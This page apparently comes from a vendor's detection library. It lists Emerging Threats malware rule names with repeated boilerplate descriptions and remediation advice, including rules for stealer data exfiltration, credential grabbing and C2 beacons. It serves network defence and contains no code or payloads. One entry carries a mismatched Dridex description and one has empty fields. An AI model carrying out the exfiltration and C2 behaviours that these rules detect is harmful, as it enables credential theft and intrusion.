Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Payload Request (grab32.rar)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Payload Request (grab64.rar)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Variant CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ursnif Variant CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ursnif Variant CnC Beacon 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ursnif Variant CnC Beacon 4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Variant CnC Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Variant Retrieving Payload (x32)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ursnif Variant Retrieving Payload (x64)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE User-Agent in Referer Field - Likely Malware

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE User-Agent (Visbot)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE User-Agent (Xmaker)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Variant.Kazy.174106 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Variant.Strictor Dropper

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Variant.Zusy.45802 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Various Malicious AlphaNum DL Feb 10 2016

Description
Copy link

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation
Copy link

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Vawtrak HTTP CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Vawtrak/NeverQuest Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vawtrak/NeverQuest CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Vawtrak/NeverQuest - Post Data Form 01

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vawtrak/NeverQuest Posting Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vawtrak/NeverQuest Posting Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vawtrak/NeverQuest Posting Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vawtrak/NeverQuest Posting Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vawtrak/NeverQuest Posting Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vawtrak/NeverQuest Posting Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vawtrak/NeverQuest Posting Data

Description
Copy link

Recommendation
Copy link

ET MALWARE Vawtrak/NeverQuest Posting Data 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBA/TrojanDownloader.Agent.PAC Retreiving Malicious VBScript

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBKlip/ClipBanker.P Status Update

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBS.ARS Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBS/Dojos Downloader Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBS/TrojanDownloader.Agent.SEB Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBS/TrojanDownloader.Agent.SEB Keep-Alive

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBS/TrojanDownloader.Agent.SEB Reporting Network Info

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBS/Wimmie.A Set

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBulletin Backdoor C2 URI Structure

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBulletin Backdoor CMD inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VenusLocker Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VenusLocker Associated User-Agent Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vicious Panda CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vidar/Arkei Stealer Client Data Upload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VikroStealer CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VikroStealer Retrieving Config

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ViperSoftX CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ViperSoftX CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VirTool.Win32/VBInject.gen!DM Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Virtumod/Agent.ufv/Virtumonde Get Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Virtumonde Variant Reporting to Controller via HTTP (3)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Virusremover2008.com Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Virut Counter/Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Virut Family GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vobfus Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VoidRay Downloader CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Volatile Cedar Win32.Explosive Fake User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Volatile Cedar Win32.Explosive HTTP CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Volatile Cedar Win32.Explosive HTTP CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Volex - OceanLotus JavaScript Load (connect.js)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VPNFilter htpx Module C2 Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE vSkimmer.PoS Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vundo User-Agent Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W2KM_BARTALEX August 11 2015

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W2KM_BARTALEX Downloading Payload 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W2KM_BARTALEX Downloading Payload M2 (set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/118GotYourNo Reporting to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/24x7Help.ScareWare CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Adrom.Backdoor CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Agent.XXZBEN Downloader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Alina.POS-Trojan Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Alina.POS-Trojan Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/AntiBreach Possible Activation Attempt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Antifulai.APT CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Antifulai.APT CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Antifulai.APT CnC Beacon 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Antifulai.APT CnC Beacon 4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Armageddon CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Asprox.Bot Knock Variant CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Asprox.ClickFraudBot CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Asprox.ClickFraudBot CnC Beacon Acknowledgement

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Asprox.ClickFraudBot POST CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Asprox CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Asprox.FakeAV Affiliate Second Stage Download Location Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Asprox Passgrub POST CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Asprox php.dll.crp POST CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Backdoor.BlackMonay Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Badur.Spy User Agent lawl

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32 Bamital or Backdoor.Win32.Shiz CnC Communication

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/BaneChant.APT Data Exfiltration POST to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/BaneChant.APT Initial CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/BaneChant.APT Winword.pkg Redirect

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Banload.VZS Banker POST CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Banload.VZS Banker POST CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Bapy.Downloader PE Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Beebus HTTP POST CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32.Berbew Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Bilakip.A Downloader API Ping CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Bilakip.A Downloader Viruslist Download For Populating FakeAV

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Bingoml!tr CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

